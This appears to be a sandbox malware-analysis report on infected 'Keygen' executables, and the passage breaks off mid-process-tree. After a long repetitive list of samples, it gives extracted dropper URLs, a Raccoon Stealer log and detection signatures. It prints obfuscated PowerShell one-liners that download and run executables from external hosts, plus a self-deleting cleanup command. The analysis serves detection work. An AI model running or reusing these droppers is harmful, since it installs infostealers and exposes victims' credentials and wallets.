Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    109s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (15) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:21:45 GMT Bot_ID: 992575D9-3ACE-4400-98F7-F39D82F3369F_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: ELJKIHEZ - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (532 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 43 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (15) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (15) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:488
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\761A.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (15) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Users\Admin\AppData\Local\Temp\761A.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1836
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\761A.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1904
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1632
          • C:\Users\Public\rte.exe
            "C:\Users\Public\rte.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2652
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2724
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3052
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 3052 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\957444500405160\\* & exit
                  8⤵
                    PID:2288
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 3052
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1288
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2752
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2928
              • C:\Users\Public\rte.exe
                "C:\Users\Public\rte.exe"
                6⤵
                • Executes dropped EXE
                PID:2824
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\761A.tmp\m1.hta"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1936
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1624
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:1948
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\761A.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1112
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1348
            • C:\Users\Public\ogp.exe
              "C:\Users\Public\ogp.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:2492
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:1916
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2848
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:2624
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2424
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
